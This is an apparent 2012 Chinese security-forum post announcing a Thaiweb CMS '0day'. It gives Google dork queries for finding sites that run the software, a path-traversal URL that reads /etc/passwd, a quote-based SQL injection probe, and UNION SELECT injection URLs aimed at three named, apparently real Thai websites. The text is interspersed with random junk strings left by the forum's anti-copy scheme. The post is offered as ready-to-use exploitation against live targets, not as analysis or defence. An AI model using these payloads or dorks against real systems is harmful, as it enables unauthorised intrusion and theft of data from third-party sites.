找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2530|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
1 H' K0 J' A& m: d- [
1 s8 h, [* ?( v( G& |/ S  Rintext:powered by Thaiweb
1 N* s! F: Z2 j1 E9 ?5 f- {3 _; x0 Q' F1 @, K
inurl:index.php?page=board.php
7 {9 i% e8 S9 Y5 @$ E
8 q6 Y2 d1 g! Z$ o ) s( @  d' D0 r# y

% Z/ K* E4 D0 A0 r利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd5 s9 Q7 h& p- ^, P" s2 u5 z7 [1 P
3 V/ f! A7 P" I( f# ]1 ^7 }
7 s; s1 l9 m6 v# v+ Z- Q  P$ z

- y; o+ j- O1 h  q利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
6 r# `( p/ o2 D' H; Z- O
/ S5 q# |$ d- [* O+ x8 Z
- R% u& O/ ?) Q+ Q5 ~! B0 S' [& G7 y% w- Y
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
$ h, O7 n# Y9 l3 c) O# C& k! a6 H% q7 g5 ?! A! x
http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--8 ]0 g1 O/ K- ]3 ~" s8 O
4 g. H& I: Q6 [" K! f! `
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
/ A* l7 p+ O9 g! R" e8 A% g  h4 ]) k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表